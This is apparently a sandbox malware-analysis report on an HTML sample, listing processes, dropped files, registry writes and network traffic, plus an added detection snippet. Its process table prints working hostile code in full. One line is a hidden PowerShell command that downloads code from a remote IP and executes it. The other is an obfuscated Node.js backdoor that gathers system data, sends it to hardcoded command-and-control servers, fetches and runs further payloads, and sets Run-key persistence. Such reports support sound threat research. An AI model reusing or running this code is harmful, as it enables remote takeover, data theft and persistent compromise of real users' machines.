download:

/

Full analysis: https://app.any.run/tasks/fb5d0399-a137-48ef-a039-c4c229f5c1bc
Verdict: Malicious activity
Analysis date: April 15, 2025, 16:30:52
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: qrcode
MIME: text/html
File info: HTML document, ASCII text, with very long lines (1172), with no line terminators
MD5: 7FA467D54CB91AF033CD4E2411163D12
SHA1: A957929F7D985D924099C52B285FB1B072B824D4
SHA256: D13D0A4E1E59949C81EBE5AC154D94D9B2263C945DB28C7225DD9DBA8F337EE0
SSDEEP: 24:hM0mIJfA+xRhcxKNt+W+urZN/p9bRXHMBe2sgR5AEg5pEI:lmI++x4S9weeRqTpx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Connects to the CnC server: powershell.exe (PID: 5968)
  • SUSPICIOUS
    • Uses SYSTEMINFO.EXE to read the environment: powershell.exe (PID: 5968), powershell.exe (PID: 5512)
    • Uses base64 encoding (POWERSHELL): powershell.exe (PID: 5968)
    • Executes script using NodeJS: node.exe (PID: 4408)
    • Get information on the list of running processes: node.exe (PID: 4408), powershell.exe (PID: 5512)
    • Starts POWERSHELL.EXE for commands execution: node.exe (PID: 4408)
    • The process checks if current user has admin rights: node.exe (PID: 4408)
    • Starts application with an unusual extension: powershell.exe (PID: 5512)
    • Checks a user's role membership (POWERSHELL): powershell.exe (PID: 5512)
    • Process uses ARP to discover network configuration: powershell.exe (PID: 5512)
  • INFO
    • Disables trace logs: powershell.exe (PID: 5968)
    • Converts byte array into Unicode string (POWERSHELL): powershell.exe (PID: 5968)
    • Checks proxy server information: powershell.exe (PID: 5968), slui.exe (PID: 7916)
    • Reads the software policy settings: slui.exe (PID: 2340), slui.exe (PID: 7916)
    • Uses string replace method (POWERSHELL): powershell.exe (PID: 5968), powershell.exe (PID: 5512)
    • Uses string split method (POWERSHELL): powershell.exe (PID: 5968)
    • The executable file from the user directory is run by the Powershell process: node.exe (PID: 4408)
    • Checks supported languages: node.exe (PID: 4408), chcp.com (PID: 7404)
    • Changes the display of characters in the console: powershell.exe (PID: 5512)
No Malware configuration.

TRiD

.htm/html | HyperText Markup Language with DOCTYPE (80.6)
.html | HyperText Markup Language (19.3)
Total processes: 152
Monitored processes: 16
Malicious processes: 1
Suspicious processes: 2

Behavior graph

Processes in the graph, from the start node: powershell.exe, conhost.exe (no specs), sppextcomobj.exe (no specs), slui.exe, systeminfo.exe (no specs), tiworker.exe (no specs), slui.exe, node.exe, conhost.exe (no specs), powershell.exe (no specs), conhost.exe (no specs), chcp.com (no specs), systeminfo.exe (no specs), tiworker.exe (no specs), tasklist.exe (no specs), arp.exe (no specs)

Process information

Each entry gives the PID, command line (CMD), image path, parent process, user, company, integrity level, description, exit code (where the process had exited), version and the first loaded modules.

PID: 2340
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path: C:\Windows\System32\slui.exe
Parent process: SppExtComObj.Exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Windows Activation Client
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll

PID: 2616
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID: 2772
CMD: "C:\WINDOWS\system32\systeminfo.exe"
Path: C:\Windows\System32\systeminfo.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Displays system information
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\systeminfo.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll

PID: 2980
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4408"C:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\node.exe" -e "const a0I=a0W;(function(g,L){const P=a0W,B=g();while(!![]){try{const W=parseInt(P(0x18a))/0x1*(parseInt(P(0x18f))/0x2)+-parseInt(P(0x16e))/0x3+parseInt(P(0x15a))/0x4*(-parseInt(P(0x14a))/0x5)+-parseInt(P(0x15f))/0x6+-parseInt(P(0x160))/0x7+-parseInt(P(0x15c))/0x8*(-parseInt(P(0x18e))/0x9)+-parseInt(P(0x170))/0xa*(-parseInt(P(0x193))/0xb);if(W===L)break;else B['push'](B['shift']());}catch(x){B['push'](B['shift']());}}}(a0B,0x587b1));const a0L=(function(){let g=!![];return function(L,B){const W=g?function(){const Q=a0W;if(B){const x=B[Q(0x1a1)](L,arguments);return B=null,x;}}:function(){};return g=![],W;};}()),a0g=a0L(this,function(){const a=a0W,g=function(){const C=a0W;let x;try{x=Function(C(0x176)+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(n){x=window;}return x;},L=g(),B=L[a(0x15e)]=L[a(0x15e)]||{},W=['log','warn',a(0x1a4),a(0x192),a(0x14d),a(0x153),a(0x1a5)];for(let x=0x0;x<W['length'];x++){const n=a0L[a(0x1aa)][a(0x185)][a(0x158)](a0L),S=W[x],K=B[S]||n;n[a(0x163)]=a0L['bind'](a0L),n[a(0x1a2)]=K[a(0x1a2)][a(0x158)](K),B[S]=n;}});function a0B(){const 
j=['message','chcp\x2065001\x20>\x20NUL\x202>&1\x20&\x20echo\x20\x27version:\x20','gzipSync','9fGiTzq','2dTKoZZ','off','fail\x20connect\x20to\x20server','error','2673WXSYyU','POST','writeFileSync','\x20/t\x20REG_SZ\x20/d\x20','statusCode','.log','log','zlib','mkdirSync','push','delay','fromCharCode','\x20get\x20commandline','177.136.225.153','apply','toString','useActive','info','trace','path','request','split','http','constructor','headers','replace','powershell.exe','CMD','application/octet-stream','wmic\x20process\x20where\x20processid=','join','reg\x20add\x20','15XDTlNk','replaceAll','\x27\x20;\x20if\x20([Security.Principal.WindowsIdentity]::GetCurrent().Name\x20-match\x20\x27(?i)SYSTEM\x27)\x20\x20{\x20\x27Runas:\x20System\x27\x20}\x20elseif\x20(([Security.Principal.WindowsPrincipal]\x20[Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))\x20{\x20\x27Runas:\x20Admin\x27\x20}\x20else\x20{\x20\x27Runas:\x20User\x27\x20}\x20;\x20systeminfo\x20;\x20echo\x20\x27=-=-=-=-=-\x27\x20;\x20tasklist\x20/svc\x20;\x20echo\x20\x27=-=-=-=-=-\x27\x20;\x20Get-Service\x20|\x20Select-Object\x20-Property\x20Name,\x20DisplayName\x20|\x20Format-List\x20;\x20echo\x20\x27=-=-=-=-=-\x27\x20;\x20Get-PSDrive\x20-PSProvider\x20FileSystem\x20|\x20Format-Table\x20-AutoSize\x20;\x20echo\x20\x27=-=-=-=-=-\x27\x20;\x20arp\x20-a','exception','ignore','floor','Execution\x20error:','alloc','EXE','table','ChromeUpdater','cmd.exe','DLL','atst','bind','\x20/v\x20','202892UqGoLI','StatusCode:','3910328NVkkzS','concat','console','1415088oQRpwQ','4472678IDLYVi','child_process','utf-8','__proto__','writeUInt32LE','rundll32.exe','188.34.195.44','chcp\x2065001\x20>\x20$null\x202>&1\x20;\x20echo\x20\x27version:\x20','argv','trim','length','connect\x20to:','node.exe','Error\x20with\x20HTTP\x20request:','1453047WvSbot','subarray','33590fTzNKY','write','pid','45.61.136.202','stderr','match','return\x20(function()\x20','HKCU\x5cSoftware\x5cMicroso
ft\x5cWindows\x5cCurrentVersion\x5cRun','unref','readUInt32LE','start','utf8','data','\x27\x20&\x20echo\x20\x27Runas:\x20Unknown\x27\x20&\x20systeminfo','end','close',',start','random','.dll','ooff','ACTIVE','prototype','\x20/f','exit','env','from','568709plXMPo'];a0B=function(){return j;};return a0B();}function a0W(g,L){const B=a0B();return a0W=function(W,x){W=W-0x147;let n=B[W];return n;},a0W(g,L);}a0g();const http=require(a0I(0x1a9)),{execSync,exec,spawn}=require(a0I(0x161)),fs=require('fs'),path=require(a0I(0x1a6)),zlib=require(a0I(0x19a));if(process['argv'][0x1]!==undefined&&process['argv'][0x2]===undefined){const child=spawn(process[a0I(0x168)][0x0],[process['argv'][0x1],'1'],{'detached':!![],'stdio':a0I(0x14e),'windowsHide':!![]});child[a0I(0x178)](),process[a0I(0x187)](0x0);}const ver='000012',PORT_HTTP=0x50,PORT_IP=0x1bb,PORT=0x5a3;let sysinfo=null;function initSysInfo(){const F=a0I;let g;try{let W=execSync(F(0x167)+ver+F(0x14c),{'encoding':F(0x162),'shell':F(0x1ad),'windowsHide':!![]});g=Buffer[F(0x189)](W,F(0x162));}catch(x){try{let n=execSync(F(0x18c)+ver+F(0x17d),{'encoding':F(0x162),'shell':F(0x155),'windowsHide':!![]});g=Buffer[F(0x189)](n,F(0x162));}catch(S){console[F(0x192)](F(0x150),S[F(0x18b)]);}}const L=Buffer[F(0x151)](0x4);L['writeUInt32LE'](Math[F(0x181)]()*0x5f5e100);const B=Buffer[F(0x151)](0x2);B['writeUInt16LE'](0x2f),sysinfo=Buffer[F(0x15d)]([L,B,g]);}function xor(g,L){const v=a0I;let B=L[0x0];for(let W=0x0,x=g[v(0x16a)];W<x;++W){B+=(B+W%0x100)%0x100,g[W]^=(L[W%0x4]^B)%0x100;}}const zlibKey=Buffer[a0I(0x151)](0x4);zlibKey[a0I(0x164)](0xfafbfdfe);const encKey=Buffer['alloc'](0x4);encKey[a0I(0x164)](0xfafbfdff);function enc(g){const y=a0I,L=Buffer['alloc'](0x4);return L[y(0x164)](Math['random']()*0x5f5e100),xor(g,L),Buffer[y(0x15d)]([zlib[y(0x18d)](Buffer[y(0x15d)]([g,L,encKey])),zlibKey]);}function atst(){const R=a0I,g=R(0x147)+process[R(0x172)]+R(0x19f);exec(g,{'windowsHide':!![]},(L,B,W)=>{const 
u=R;if(L){console[u(0x192)](''+L[u(0x18b)]);return;}if(W){console[u(0x192)](''+W);return;}const x=String[u(0x19e)](0x22);let n;if(B[u(0x1a2)]()[u(0x175)](/\s-e\s/g)){const K=B[u(0x1a2)]()[u(0x1a8)]('\x0a',0x2)[0x1][u(0x169)]()[u(0x1a8)](/node\.exe.*?\s-e\s+/,0x2)[0x1]['trim']()[u(0x14b)](x,''),H=process[u(0x168)][0x0][u(0x1ac)](u(0x16c),randStr(0x8)+u(0x198));fs[u(0x195)](H,K),n=process[u(0x168)][0x0]+'\x20'+H;}else n=process[u(0x168)][0x0]+'\x20'+process[u(0x168)][0x1];const S=u(0x149)+x+u(0x177)+x+u(0x159)+x+u(0x154)+x+u(0x196)+x+n[u(0x14b)](x,'\x5c'+x)+x+u(0x186);exec(S,{'windowsHide':!![]},(e,D,f)=>{const h=u;e&&console[h(0x192)](''+e[h(0x18b)]),f&&console[h(0x192)](''+f);});});}const TypeFile={'EXE':0x0,'DLL':0x1,'JS':0x2,'CMD':0x3,'ACTIVE':0x4,'OTHER':0x5};function randStr(g){const t=a0I;return Math[t(0x181)]()['toString'](0x24)['substring'](0x2,g+0x2);}function start(g,L){const o=a0I;let B,W=[];switch(L){case TypeFile[o(0x152)]:B=g,W=[];break;case TypeFile[o(0x156)]:B=o(0x165),W=[g+o(0x180)];break;case TypeFile['JS']:B=process['argv'][0x0],W=['-e',g];break;default:return;}const x=spawn(B,W,{'detached':!![],'stdio':o(0x14e),'windowsHide':!![]});x[o(0x178)]();}let lastCmd=null;function startCmd(g){const p=a0I;let L;try{L=spawn(g,{'shell':'cmd.exe','windowsHide':!![]});}catch(W){console['error'](''+W[p(0x18b)]);return;}let B='';L['stdout']['on'](p(0x17c),x=>{const l=p;B+=x[l(0x1a2)]();}),L[p(0x174)]['on']('data',x=>{const O=p;B+=x[O(0x1a2)]();}),L['on'](p(0x17f),x=>{lastCmd=B;});}function main(g,L){const Z=a0I;console[Z(0x199)](Z(0x16b),g);let B=sysinfo;lastCmd!==null?(B=Buffer['concat']([sysinfo,Buffer['from']('\x0a=-c=-m=-d=-=-\x0a','utf-8'),Buffer[Z(0x189)](lastCmd,Z(0x162))]),lastCmd=null):B=Buffer[Z(0x15d)]([sysinfo]);B=enc(B);const W={'hostname':g,'port':L,'path':'/init1234','method':Z(0x194),'headers':{'Content-Type':Z(0x1af),'Content-Length':B[Z(0x16a)]}};return new Promise((x,n)=>{const N=Z,S=http[N(0x1a7)](W,K=>{const 
k=N,H=[];console[k(0x199)](K[k(0x1ab)]),console[k(0x199)](k(0x15b),K['statusCode']),K['on'](k(0x17c),e=>{const E=k;H[E(0x19c)](e);}),K['on'](k(0x17e),()=>{const s=k,D=Buffer[s(0x15d)](H);if(K[s(0x197)]!==0xc8&&K[s(0x197)]!==0xcc){n(s(0x191));return;}if(K[s(0x197)]===0xcc){x({});return;}if(D[s(0x16a)]===0x4&&D[s(0x1a2)]()===s(0x183))console[s(0x199)](s(0x190)),process[s(0x187)](0x0);else{if(D[s(0x16a)]===0x4&&D[s(0x1a2)]()===s(0x157)){console['log'](s(0x157));try{atst();}catch(d){console[s(0x192)](d);}x({});return;}}const f=D['subarray'](0x0,D[s(0x16a)]-0x4),z=D[s(0x16f)](D[s(0x16a)]-0x4,D[s(0x16a)]);xor(f,z);const Y=f[f[s(0x16a)]-0x1],V=f[s(0x16f)](0x0,f[s(0x16a)]-0x1);let q;switch(Y){case TypeFile['EXE']:q='.exe';break;case TypeFile[s(0x156)]:q=s(0x182);break;case TypeFile['JS']:q='.js';break;case TypeFile[s(0x1ae)]:startCmd(V[s(0x1a2)](s(0x17b))),x({});return;case TypeFile[s(0x184)]:useActive=V[s(0x179)](),x({});return;default:q=s(0x198);break;}let w;Y===TypeFile['JS']?w=V[s(0x1a2)](s(0x17b)):(w=path[s(0x148)](process[s(0x188)]['APPDATA'],randStr(0x8)),fs[s(0x19b)](w,{'recursive':!![]}),w=path[s(0x148)](w[s(0x1a2)](),randStr(0x8)+q),fs['writeFileSync'](w,V),console[s(0x199)](s(0x17a),w)),start(w,Y),x({});});});S['on'](N(0x192),K=>{n(K);}),S[N(0x171)](B),S[N(0x17e)]();});}initSysInfo();const hostsIp=[a0I(0x173),a0I(0x166),a0I(0x1a0)];let useIp=0x0,delay=0x1,useActive=0x0;async function mainloop(){const c=a0I;let g=hostsIp[Math[c(0x14f)](Math[c(0x181)]()*0x3e8)%hostsIp[c(0x16a)]];while(!![]){console[c(0x199)](c(0x19d),delay),await new Promise(L=>setTimeout(L,delay));try{await main(g,PORT_IP);}catch(L){console['error'](c(0x16d),L[c(0x18b)]),g=hostsIp[Math[c(0x14f)](Math[c(0x181)]()*0x3e8)%hostsIp[c(0x16a)]],useIp++,delay=0x3e8*0xa,useActive=0x0;continue;}console[c(0x199)](c(0x1a3),useActive),useActive>0x0?(delay=0x3e8*0xa,--useActive):delay=0x3e8*0x3c*0x5;}}mainloop();" C:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\node.exe
Parent process: powershell.exe
User: admin
Company: Node.js
Integrity Level: MEDIUM
Description: Node.js JavaScript Runtime
Version: 22.11.0
Modules (images):
c:\users\admin\appdata\roaming\node-v22.11.0-win-x64\node.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\advapi32.dll

PID: 4920
CMD: C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path: C:\Windows\System32\SppExtComObj.Exe
Parent process: svchost.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: KMS Connection Broker
Exit code: 0
Version: 10.0.19041.3996 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll

PID: 5512
CMD: powershell.exe -c "chcp 65001 > $null 2>&1 ; echo 'version: 000012' ; if ([Security.Principal.WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM') { 'Runas: System' } elseif (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 'Runas: Admin' } else { 'Runas: User' } ; systeminfo ; echo '=-=-=-=-=-' ; tasklist /svc ; echo '=-=-=-=-=-' ; Get-Service | Select-Object -Property Name, DisplayName | Format-List ; echo '=-=-=-=-=-' ; Get-PSDrive -PSProvider FileSystem | Format-Table -AutoSize ; echo '=-=-=-=-=-' ; arp -a"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: node.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll

PID: 5892
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: node.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID: 5968
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -c "$a=159; $b=223; $c=139; $d=207; $e=':8080/'; $u=[string]$a+'.'+$b+'.'+$c+'.'+$d+$e; $t=[math]::Floor(([datetime]::UtcNow-[datetime]'1970-01-01').TotalSeconds/16)*16; iex(irm($u+$t))"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID: 6700
CMD: "C:\WINDOWS\system32\ARP.EXE" -a
Path: C:\Windows\System32\ARP.EXE
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: TCP/IP Arp Command
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\arp.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\snmpapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
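
The PID 5968 command line is the stage-1 downloader. It hides its window (-w h), joins four integers into the host 159.223.139.207, floors the current UTC time in seconds to a multiple of 16 and uses that number as the request path, then hands whatever comes back to Invoke-Expression (iex(irm ...)). Both requests the sandbox recorded from that process went to http://159.223.139.207:8080/1744734656, the GET fetching the next stage and the POST reporting back to the same path. The block below is an added example written for this page, not code from the report or from the malware; it reproduces the bucket arithmetic and shows the check a detection needs instead of a fixed URL, which is the idea behind the "Unix Timestamp In HTTP URI" alert in the Threats section. The request time inside analysisCheck() is an assumption placed a few seconds into the window that the observed path denotes; no network access is made.

```javascript
'use strict';

// Values copied from the PID 5968 command line: $a.$b.$c.$d, $e, and the /16*16 rounding.
const STAGER_HOST = '159.223.139.207';
const STAGER_PORT = 8080;
const BUCKET_SECONDS = 16;

// [math]::Floor(epochSeconds / 16) * 16: the path changes every 16 seconds.
function stagerBucket(epochSeconds) {
  return Math.floor(epochSeconds / BUCKET_SECONDS) * BUCKET_SECONDS;
}

// $u + $t: the URL the stager passes to irm (Invoke-RestMethod) and then to iex.
function stagerUrl(epochSeconds) {
  return `http://${STAGER_HOST}:${STAGER_PORT}/${stagerBucket(epochSeconds)}`;
}

// Detection angle: a static URL IOC is stale after 16 s, so match the pattern instead.
// The path's only component is a 10-digit integer that reads as a Unix time close to the
// request itself. toleranceSeconds absorbs clock skew between victim and sensor.
function looksLikeTimestampUri(path, requestEpochSeconds, toleranceSeconds = 600) {
  const m = /^\/(\d{10})\/?$/.exec(path);
  if (!m) return false;
  return Math.abs(Number(m[1]) - requestEpochSeconds) <= toleranceSeconds;
}

// Worked check against the report: PID 5968 requested /1744734656, the bucket that
// starts at 2025-04-15T16:30:56Z, four seconds after the report's analysis timestamp.
// The request time below is an assumption placed inside that 16-second window.
function analysisCheck() {
  const observedPath = '/1744734656';
  const requestTime = Date.UTC(2025, 3, 15, 16, 31, 0) / 1000;  // assumed: 2025-04-15T16:31:00Z
  return {
    url: stagerUrl(requestTime),                                   // rebuilt URL
    windowStart: new Date(stagerBucket(requestTime) * 1000).toISOString(),
    flagged: looksLikeTimestampUri(observedPath, requestTime),     // would the pattern check fire
  };
}
```

Call analysisCheck() to see the rebuilt URL match the one in the HTTP requests table; for a live sensor, feed looksLikeTimestampUri() the URI path and the packet timestamp rather than the current clock, since the path encodes the time the victim built it.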
Total events: 79 452
Read events: 79 447
Write events: 5
Delete events: 0

Modification events

TiWorker.exe (PID 7584), key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
  write SessionIdHigh = 31174179
  write SessionIdLow (value not shown in the report)
powershell.exe (PID 5968), key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
  write {2781761E-28E0-4109-99FE-B9D127C57AFE} {56FFCC30-D398-11D0-B2AE-00A0C908FA49} 0xFFFF = 0100000000000000B228E4F523AEDB01
TiWorker.exe (PID 7628), key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
  write SessionIdHigh = 31174180
  write SessionIdLow (value not shown in the report)

Executable files: 15
Suspicious files: 1 817
Text files: 693
Unknown types: 0

Dropped files

Columns: PID, process, filename, type, MD5, SHA256.

5968 powershell.exe  C:\Users\admin\AppData\Local\Temp\downloaded.zip  (type and hashes not listed)
5968 powershell.exe  C:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\node.exe  (type and hashes not listed)
5968 powershell.exe  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VP6WPPXB9KYCJH2XAZ3C.temp  binary
    MD5: FDB29DD6DB807CBF55C9F2F488CB9ED2
    SHA256: AC918F5F5754430763D244E0ACA7CA7DB18C3FC96F7222C009EA0B2090B1C421
5968 powershell.exe  C:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\CHANGELOG.md  html
    MD5: 50E67CCCAB5C16A988474497C21E060B
    SHA256: B8AEC39E3CF2FBDF90D560FED838A5AD0DE61420DE69F5696F7BBB60D1C0C8B2
5968 powershell.exe  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10c19c.TMP  binary
    MD5: D040F64E9E7A2BB91ABCA5613424598E
    SHA256: D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
5968 powershell.exe  C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_deim3qt3.25q.ps1  text
    MD5: D17FE0A3F47BE24A6453E9EF58C94641
    SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5968 powershell.exe  C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lxvnir21.04u.psm1  text
    MD5: D17FE0A3F47BE24A6453E9EF58C94641
    SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5968 powershell.exe  C:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\install_tools.bat  text
    MD5: BE9D6FF7F9F07F2D35E42A397928F165
    SHA256: 7F34F73126F62888C7354FEA6EC4ED48679824E8972AE47F650B520055B8A975
5968 powershell.exe  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms  binary
    MD5: FDB29DD6DB807CBF55C9F2F488CB9ED2
    SHA256: AC918F5F5754430763D244E0ACA7CA7DB18C3FC96F7222C009EA0B2090B1C421
7584 TiWorker.exe  C:\Windows\Logs\CBS\CBS.log  text
    MD5: 0B7E2E57D407E2FCE762590F356B9F31
    SHA256: 088DF9FF94BE1FFAA82867B08FC764700A9A19101D88171265D881BEF4BF5C0F
HTTP(S) requests: 7
TCP/UDP connections: 26
DNS requests: 15
Threats: 6

HTTP requests

Columns: PID, process, method, HTTP code, IP:port, URL, CN, reputation (the type and size columns are not populated in this report).

(PID not shown)  GET  200  2.16.241.19:80  http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl  unknown  whitelisted
5968 powershell.exe  GET  200  159.223.139.207:8080  http://159.223.139.207:8080/1744734656  unknown
6544 svchost.exe  GET  200  2.17.190.73:80  http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D  unknown  whitelisted
5968 powershell.exe  POST  200  159.223.139.207:8080  http://159.223.139.207:8080/1744734656  unknown
7788 SIHClient.exe  GET  200  95.101.149.131:80  http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl  unknown  whitelisted
7788 SIHClient.exe  GET  200  95.101.149.131:80  http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl  unknown  whitelisted
4408 node.exe  POST  204  188.34.195.44:443  http://188.34.195.44:443/init1234  unknown

Connections

Columns: PID, process, IP:port, domain, ASN, country, reputation.

4 System  192.168.100.255:138  whitelisted
(PID not shown)  2.16.241.19:80  crl.microsoft.com  Akamai International B.V.  DE  whitelisted
2104 svchost.exe  4.231.128.59:443  MICROSOFT-CORP-MSN-AS-BLOCK  IE  whitelisted
(PID not shown)  4.231.128.59:443  MICROSOFT-CORP-MSN-AS-BLOCK  IE  whitelisted
5496 MoUsoCoreWorker.exe  4.231.128.59:443  MICROSOFT-CORP-MSN-AS-BLOCK  IE  whitelisted
2112 svchost.exe  4.231.128.59:443  MICROSOFT-CORP-MSN-AS-BLOCK  IE  whitelisted
3216 svchost.exe  172.211.123.250:443  client.wns.windows.com  MICROSOFT-CORP-MSN-AS-BLOCK  FR  whitelisted
5968 powershell.exe  159.223.139.207:8080  DIGITALOCEAN-ASN  US  unknown
6544 svchost.exe  20.190.160.131:443  login.live.com  MICROSOFT-CORP-MSN-AS-BLOCK  NL  whitelisted
